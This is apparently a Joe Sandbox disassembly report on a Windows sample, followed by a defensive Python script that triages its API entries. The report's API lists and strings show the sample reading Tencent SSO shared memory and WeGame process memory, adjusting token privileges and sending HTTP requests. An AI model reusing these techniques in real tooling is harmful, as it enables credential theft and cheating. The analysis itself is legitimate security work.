114736 4cb6b0 PathFileExistsA 114689->114736 114690 48380f 114722 484545 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114690->114722 114723 484331 50 API calls 114692->114723 114695 4842ef PathFileExistsA 114694->114695 114698 483993 114695->114698 114696 483902 114724 484545 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114696->114724 114698->114689 114725 484331 50 API calls 114698->114725 114700 4839f5 114726 484545 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114700->114726 114702->114616 114703->114626 114706 4cebb6 114704->114706 114705 4cec8e 114705->114636 114706->114705 114707 4d2327 19 API calls 114706->114707 114708 4cebec 114707->114708 114709 4cec22 RegOpenKeyA 114708->114709 114710 4cec76 114709->114710 114711 4cec33 RegQueryValueExA 114709->114711 114713 4d22ee 19 API calls 114710->114713 114712 4cec5c RegCloseKey 114711->114712 114712->114710 114715 4cec7c 
114713->114715 114715->114636 114717 48430f 114716->114717 114717->114671 114718->114659 114719->114659 114720->114659 114721->114690 114722->114689 114723->114696 114724->114689 114725->114700 114726->114689 114727->114659 114728->114676 114729->114689 114730->114659 114731->114679 114732->114689 114733->114659 114734->114681 114735->114689 114736->114666 114738 439a6c 114737->114738 114739 439abf GetCurrentProcess 114738->114739 114742 439af4 114739->114742 114740 439b24 OpenProcessToken 114741 439b5d LookupPrivilegeValueA 114740->114741 114743 439b46 114740->114743 114744 439b91 AdjustTokenPrivileges 114741->114744 114745 439b7a 114741->114745 114742->114740 114743->114741 114746 439c18 114744->114746 114747 439c2f CloseHandle 114744->114747 114745->114744 114746->114747 114748 439c47 114747->114748 114748->114532 114835 454e4e GetPEB 114749->114835 114752 454e4e GetPEB 114753 454ae3 114752->114753 114754 454e4e GetPEB 114753->114754 114775 454aa4 114753->114775 114755 454b2f 114754->114755 114756 454e4e GetPEB 114755->114756 114755->114775 114757 454b7b 114756->114757 114758 454e4e GetPEB 114757->114758 114757->114775 114759 454bc7 114758->114759 114760 454e4e GetPEB 114759->114760 114759->114775 114761 454c13 114760->114761 114762 454e4e GetPEB 114761->114762 114761->114775 114763 454c5f 114762->114763 114764 454e4e GetPEB 114763->114764 114763->114775 114765 454cab 114764->114765 114766 454e4e GetPEB 114765->114766 114765->114775 114767 454cf7 114766->114767 114768 454e4e GetPEB 114767->114768 114767->114775 114769 454d43 114768->114769 114770 454e4e GetPEB 114769->114770 114769->114775 114771 454d8f 114770->114771 114772 454e4e GetPEB 114771->114772 114771->114775 114773 454ddb 114772->114773 114774 454e4e GetPEB 114773->114774 114773->114775 114774->114775 114775->114535 114777 4caef0 5 API calls 114776->114777 114778 450dfc 114777->114778 114779 450e16 GetTempPathA 114778->114779 114780 450e34 114779->114780 114837 4cc400 114780->114837 114782 450e6e 
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                • InternetOpenA.WININET(?,00000003,?,004EE2EC,00000000), ref: 00404FB4
                                                                • InternetOpenA.WININET(?,00000003,?,004EE2EC,00000000), ref: 0040501C
                                                                • InternetOpenA.WININET(?,00000003,?,004EE2EC,00000000), ref: 0040507C
                                                                • InternetConnectA.WININET(00000000,?,?,?,?,00000003,00000000,00000000), ref: 0040516C
                                                                • InternetCloseHandle.WININET(00000000), ref: 004051DB
                                                                • HttpOpenRequestA.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,?,00000000), ref: 00405383
                                                                • InternetCloseHandle.WININET(00000000), ref: 004053F2
                                                                • InternetCloseHandle.WININET(00000000), ref: 0040541E
                                                                • InternetSetOptionA.WININET(00000000,0000001F,00000000,00000004), ref: 0040546A
                                                                • HttpSendRequestA.WININET(00000000,?,00000000,00000000,00000000), ref: 00405806
                                                                • HttpSendRequestA.WININET(00000000,?,00000000,00000000,00000000), ref: 0040592C
                                                                • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 004059AC
                                                                • HttpQueryInfoA.WININET(00000000,00000016,00000000,00000000,00000000), ref: 00405AAB
                                                                • InternetCloseHandle.WININET(00000000), ref: 00405AD7
                                                                • InternetCloseHandle.WININET(00000000), ref: 00405B03
                                                                • InternetCloseHandle.WININET(00000000), ref: 00405B2F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$CloseHandle$Open$Http$Request$Send$ConnectFileInfoOptionQueryRead
                                                                • String ID: Accept-Language: zh-cn$Accept: */*$Content-Type: application/x-www-form-urlencoded$Cookie: $Referer: $Accept-Language:$Accept:$Accept: */*$Content-Type:$Cookie:$GET$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$Referer:$SOCKS=$Set-Cookie$Set-Cookie:$User-Agent:$http=$https://
                                                                • API String ID: 1104500937-800079585
                                                                • Opcode ID: 3923d819c6e7fd806b54cf0fb44227f2a451b96b0f7bba4b9afe3a24b806bfb6
                                                                • Instruction ID: 3487847d62d66b15dd1303eb1634049b0c62095754e2fd05f0ac3a769375eacf
                                                                • Opcode Fuzzy Hash: 3923d819c6e7fd806b54cf0fb44227f2a451b96b0f7bba4b9afe3a24b806bfb6
                                                                • Instruction Fuzzy Hash: 33C271B1F40354BBEB10EF96EC82B9E77B5EB18714F14003AFA05BA2C2D6795D108B59
                                                                APIs
                                                                  • Part of subcall function 0040A136: GetProcessHeap.KERNEL32(?,0041C74B,?,00429A2F), ref: 0040A159
                                                                  • Part of subcall function 0040A136: RtlAllocateHeap.NTDLL(?,00000000,00000018), ref: 0040A192
                                                                  • Part of subcall function 0040A136: RtlInitializeCriticalSection.NTDLL ref: 0040A1C6
                                                                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040980A
                                                                • VirtualAlloc.KERNEL32(00000000,00000200,00001000,00000040,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00409889
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004098D4
                                                                • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409932
                                                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 00409991
                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004099C7
                                                                • RtlCreateUnicodeStringFromAsciiz.NTDLL(00000000,00000000), ref: 00409F1F
                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000000,00000000), ref: 00409F7D
                                                                • RtlFreeAnsiString.NTDLL(00000000), ref: 00409FAA
                                                                • RtlLeaveCriticalSection.NTDLL(004F823C), ref: 0040A0B0
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,00000000), ref: 0040A0F0
                                                                  • Part of subcall function 0040A535: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040A592
                                                                  • Part of subcall function 0040A535: GetModuleFileNameA.KERNEL32(00000000,00000100), ref: 0040A614
                                                                  • Part of subcall function 0040A535: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000), ref: 0040A6B7
                                                                  • Part of subcall function 0040A535: LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040A6F7
                                                                  • Part of subcall function 0040A535: VirtualFree.KERNEL32(00000000,00008000,00000000,00000000,00000000,?,?,00000000), ref: 0040A7B2
                                                                  • Part of subcall function 0040A535: VirtualProtect.KERNEL32(?,00000005,00000040,00000000,00000000,?,00000000,00000005,?,?,?,?,?,00000000,00000000), ref: 0040A9C5
                                                                  • Part of subcall function 0040A535: VirtualProtect.KERNEL32(?,00000005,00000040,?,?,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0040AA67
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Virtual$Load$Library$CriticalFreeHeapSection$AllocModuleProcessProtectString$AllocateAnsiAsciizCreateEnterFileFromHandleInitializeLeaveNameUnicode
                                                                • String ID: NtClose$NtCreateFile$NtCreateSection$NtMapViewOfSection$NtOpenFile$NtQueryAttributesFile$NtQueryInformationFile$NtQueryVolumeInformationFile$NtReadFile$NtSetInformationFile$RtlMoveMemory$VirtualProtect$\??\$kernel32.dll$ntdll.dll
                                                                • API String ID: 2342276934-1620435291
                                                                • Opcode ID: a9f9367986910d8fc6393f3891df1bc071a778b5e9cdd406c24e9eb902456b7b
                                                                • Instruction ID: b3fef5732e814daf5aa1c2ccea742f75e661dbde687e91b05b756fbea03c6a59
                                                                • Opcode Fuzzy Hash: a9f9367986910d8fc6393f3891df1bc071a778b5e9cdd406c24e9eb902456b7b
                                                                • Instruction Fuzzy Hash: 95526D71E01308ABEB10EF95ED82BAEB675EB05314F20103AF605BA2D2D7795D50CB5E
                                                                APIs
                                                                • OpenFileMappingA.KERNEL32(00000004,00000000,TX_SSO_SHARE_INFO_0), ref: 00401476
                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 004014BF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$MappingOpenView
                                                                • String ID: 000366F575200070B97D87E8C711BADA8ADCAF68322D7EE37225BD129C4B78DFDC549D5529664282549B60D56803B4A58AB59D2FE40DD7AAC45D380531C6120936D819B8B4A73A634A68A2BF2A6ED2542705E23B74B785D9A92B8AE497A844A5CFE0E2605DEECD773ECAD0A92AEB2AF7046E4223E913C0F9$8003$85E792E781E7B3E7A0E7B3E7B8E7A0E7B3E7ACE782E79EE7$87E590E583E5B6E580E596E596E58CE58AE58BE5AEE580E59CE5$87E590E583E5B6E58CE582E5B6E580E596E596E58CE58AE58BE5$91F386F395F3A7F3B4F3A7F3$@N$AFCBBCCB98CB98CB84CB94CB8ACBA8CBA8CBA4CBBECBA5CBBFCB94CBAFCBBCCB8ACBA8CBA8CBA4CBBECBA5CBBFCB9ECBA2CBA5CB$TX_SSO_SHARE_INFO_0$h $h.$h.$hN$hN$jjj$jjj$tgp_daemon.exe$wegame.exe
                                                                • API String ID: 3439327939-2767017367
                                                                • Opcode ID: 81ce84bf1678faba9514cd4a145f00f47845c6f511143a2d03661ed4039b29f0
                                                                • Instruction ID: b97c0e518f47852a826e6396cd76d5b16d0cc7b2db04b444362a48abd3bc2168
                                                                • Opcode Fuzzy Hash: 81ce84bf1678faba9514cd4a145f00f47845c6f511143a2d03661ed4039b29f0
                                                                • Instruction Fuzzy Hash: 22B246B1F00358AFEB10DFA5DC86F9E77B8AB08304F1400BAF609F6292D6755E548B59

                                                                Control-flow Graph: function 0x40a535 (basic blocks 0x40a535 through 0x40aac2). Calls on the graph: LoadLibraryA, GetModuleFileNameA, VirtualAlloc, LoadLibraryA, VirtualProtect (twice), VirtualFree; internal subcalls 0x40a1f0, 0x40a245, 0x40aac5, 0x40abf0, 0x40ac3d, 0x42b920, 0x42bbe0, 0x42c090, 0x42c250, with error paths through 0x429a56 and 0x429a74. The rendered graph (executed / not-executed block colouring and the edge list) is omitted.
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040A592
                                                                • GetModuleFileNameA.KERNEL32(00000000,00000100), ref: 0040A614
                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000), ref: 0040A6B7
                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040A6F7
                                                                • VirtualFree.KERNEL32(00000000,00008000,00000000,00000000,00000000,?,?,00000000), ref: 0040A7B2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoadVirtual$AllocFileFreeModuleName
                                                                • String ID: @$RtlMoveMemory$VirtualProtect$kernel32.dll$ntdll.dll
                                                                • API String ID: 2588548563-3509220722
                                                                • Opcode ID: 4851506355bb36296e64d2c209bf4e2fbf9e8c961bd7b4444181c30ce4c8edac
                                                                • Instruction ID: ca07fe7d52d382fe171430fc46f04095505581b5e57dbb9533913919d189fc1d
                                                                • Opcode Fuzzy Hash: 4851506355bb36296e64d2c209bf4e2fbf9e8c961bd7b4444181c30ce4c8edac
                                                                • Instruction Fuzzy Hash: 05F1D171E00318ABEB00DF95D8C5BDDBBB4AB0D310F14506AEA047A292D7756964CF6A

                                                                Control-flow Graph: function 0x403a0c (basic blocks 0x403a0c through 0x403efd). Calls on the graph: CoInitialize, CoInitializeSecurity, CoCreateInstance, SysFreeString, CoSetProxyBlanket, CoUninitialize; internal subcalls 0x403f00, 0x40461e, 0x40480f, 0x404884, 0x4048bc, 0x429f70, with error paths through 0x429a56 and 0x429a74. The rendered graph (executed / not-executed block colouring and the edge list) is omitted.
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 00403AD9
                                                                • CoInitializeSecurity.COMBASE(00000000,FFFFFFFF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00403B2F
                                                                • CoCreateInstance.COMBASE(00000000,00000000,00000000), ref: 00403C98
                                                                • CoUninitialize.COMBASE ref: 00403E90
                                                                  • Part of subcall function 0040480F: SysAllocString.OLEAUT32(?), ref: 0040483D
                                                                • SysFreeString.OLEAUT32(00000000), ref: 00403DF6
                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00403E4F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeString$AllocBlanketCreateFreeInstanceProxySecurityUninitialize
                                                                • String ID: {4590f811-1d3a-11d0-891f-00aa004b2e24}${dc12a687-737f-11cf-884d-00aa004b2e24}$7@$7@
                                                                • API String ID: 1092132261-1252387871
                                                                • Opcode ID: 7696857a22e414a27a6fd583d34635aa6cf50c63e144fafc709a209e06621016
                                                                • Instruction ID: cfc26d1bc2f6de21044264064bf03f8d0852b47ac918b2d33f3114841c8566df
                                                                • Opcode Fuzzy Hash: 7696857a22e414a27a6fd583d34635aa6cf50c63e144fafc709a209e06621016
                                                                • Instruction Fuzzy Hash: 6BD193B1E40345ABEB00DF95ECC2B9EB7B8EF19324F145036E505BB381D279A910CB66

                                                                Control-flow Graph: function 0x440195 (basic blocks 0x440195 through 0x440ff0). Calls on the graph: NtQueryVirtualMemory (twice), ReadProcessMemory (twice), CloseHandle; internal subcalls 0x43926d, 0x439e30, 0x440ff3, 0x4c9625, 0x4c962b, 0x4c9631, 0x4c9655, 0x4ca2b0, 0x4cada0, 0x4cb760, 0x4cb7c0. The rendered graph (executed / not-executed block colouring and the edge list) is omitted.
                                                                APIs
                                                                • NtQueryVirtualMemory.NTDLL(00000000,00001000,00000000,?,0000001C,00000000), ref: 004403AF
                                                                • NtQueryVirtualMemory.NTDLL(00000000,00001000,00000002,00000000,?,?), ref: 00440466
                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00000108,00000000,?,?,-00000044,?,?,-00000004), ref: 00440647
                                                                • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,?,00000108,00000000), ref: 00440A02
                                                                • CloseHandle.KERNEL32(00000000,?,?,-00000044,?,?,-00000004), ref: 00440EE5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Memory$ProcessQueryReadVirtual$CloseHandle
                                                                • String ID: Game-EC.fne$lib
                                                                • API String ID: 1831247485-2734279690
                                                                • Opcode ID: 495a1c9a12467687f5be73e64ca0e60a0123d6c9ddac438132cb1f9e78911890
                                                                • Instruction ID: 03b46992964d38843ceb33e277ed1cf5a1a069a55218fb361356d1ede2fd581d
                                                                • Opcode Fuzzy Hash: 495a1c9a12467687f5be73e64ca0e60a0123d6c9ddac438132cb1f9e78911890
                                                                • Instruction Fuzzy Hash: D4A249B1A802569BFB00CF98DCC1B99B7B1FF59324F281065E945AF345D378B861CB26
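                                                                The facts an analyst needs from the API lists in these entries are buried in raw hex arguments: 0x40 as the fourth VirtualAlloc argument at 0040A6B7, 0x1F0FFF as the first OpenProcess argument at 0041BE70, the impersonation level 3 passed to CoInitializeSecurity at 00403B2F, and the two GUIDs in the String ID of the CoCreateInstance entry. The Python below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses lines in the report's `API.MODULE(args), ref: ADDRESS` notation (the sample lines are copied from this page, marked as constructed input) and decodes the Windows SDK constants against a few triage rules. The finding labels and the rules themselves are my own choice, and the code assumes the report lists arguments in API order, possibly followed by extra stack slots that it ignores.

```python
import re
from dataclasses import dataclass

# Constructed sample input: API lines copied verbatim from the disassembly entries of this report.
SAMPLE_API_LINES = """
• LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040A592
• VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000), ref: 0040A6B7
• VirtualFree.KERNEL32(00000000,00008000,00000000,00000000,00000000,?,?,00000000), ref: 0040A7B2
• CoInitializeSecurity.COMBASE(00000000,FFFFFFFF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00403B2F
• CoUninitialize.COMBASE ref: 00403E90
  • Part of subcall function 0040480F: SysAllocString.OLEAUT32(?), ref: 0040483D
• OpenProcess.KERNEL32(001F0FFF,00000000,000000FF,00000000), ref: 0041BE70
• ReadProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041BFDF
• OpenFileMappingA.KERNEL32(00000004,00000000,TX_SSO_SHARE_INFO_0), ref: 00401476
"""
# Constructed sample: the String ID line of the CoCreateInstance entry on this page.
SAMPLE_STRING_LINE = "• String ID: {4590f811-1d3a-11d0-891f-00aa004b2e24}${dc12a687-737f-11cf-884d-00aa004b2e24}$7@$7@"

# Joe Sandbox notation: API.MODULE(arg,arg,...), ref: ADDRESS ; args are hex without 0x, '?' means unknown.
API_RE = re.compile(r"(\w+)\.(\w+)(?:\(([^)]*)\))?,? ref: ([0-9A-Fa-f]+)")
GUID_RE = re.compile(r"\{[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\}")

# Windows SDK constants used by the triage rules.
PAGE_EXECUTE_MASK = 0xF0              # PAGE_EXECUTE* protections all live in the high nibble
PROCESS_ALL_ACCESS_XP = 0x1F0FFF      # STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFF (pre-Vista header value)
PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_WRITE = 0x02, 0x08, 0x20
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE
RPC_C_IMP_LEVEL_IMPERSONATE = 3
KNOWN_GUIDS = {
    "{4590f811-1d3a-11d0-891f-00aa004b2e24}": "CLSID_WbemLocator",
    "{dc12a687-737f-11cf-884d-00aa004b2e24}": "IID_IWbemLocator",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # int for hex values, None for '?', str for names such as ntdll.dll
    ref: int     # address of the call site


def parse_arg(token):
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)      # also covers negative stack offsets such as -00000044
    except ValueError:
        return token


def parse_api_line(line):
    """Parse one report line; returns None for lines that are not API entries."""
    m = API_RE.search(line)
    if not m:
        return None
    name, module, args, ref = m.groups()
    parsed = [parse_arg(a) for a in args.split(",")] if args else []
    return ApiCall(name, module, parsed, int(ref, 16))


def parse_api_lines(text):
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def triage(calls):
    """Return (label, call-site address, detail) for the calls worth looking at first.
    Assumption: arguments are listed in API order, so only the leading positions are decoded."""
    findings = []
    for c in calls:
        a = c.args
        if c.name == "VirtualAlloc" and len(a) >= 4 and isinstance(a[3], int) and a[3] & PAGE_EXECUTE_MASK:
            findings.append(("rwx_alloc", c.ref, f"flProtect=0x{a[3]:X} (executable)"))
        elif c.name == "OpenProcess" and a and isinstance(a[0], int):
            if a[0] == PROCESS_ALL_ACCESS_XP or a[0] & INJECT_MASK:
                pid = a[2] if len(a) > 2 and isinstance(a[2], int) else None
                findings.append(("process_handle", c.ref, f"dwDesiredAccess=0x{a[0]:X} pid={pid}"))
        elif c.name in ("ReadProcessMemory", "WriteProcessMemory", "VirtualQueryEx", "NtQueryVirtualMemory"):
            findings.append(("cross_process_memory", c.ref, c.name))
        elif c.name.startswith("OpenFileMapping") and len(a) >= 3 and isinstance(a[0], int) and isinstance(a[2], str):
            findings.append(("named_section", c.ref, f"name={a[2]} access=0x{a[0]:X}"))
        elif c.name == "CoInitializeSecurity" and len(a) >= 6 and a[5] == RPC_C_IMP_LEVEL_IMPERSONATE:
            findings.append(("com_impersonate", c.ref, "dwImpLevel=RPC_C_IMP_LEVEL_IMPERSONATE"))
    return findings


def known_guids(text):
    """Map the GUIDs in a String ID line to their SDK names; unknown GUIDs are reported as such."""
    return [(g, KNOWN_GUIDS.get(g.lower(), "unknown")) for g in GUID_RE.findall(text)]


if __name__ == "__main__":
    for label, ref, detail in triage(parse_api_lines(SAMPLE_API_LINES)):
        print(f"{ref:08X} {label:22} {detail}")
    for guid, name in known_guids(SAMPLE_STRING_LINE):
        print(f"{guid} {name}")
```

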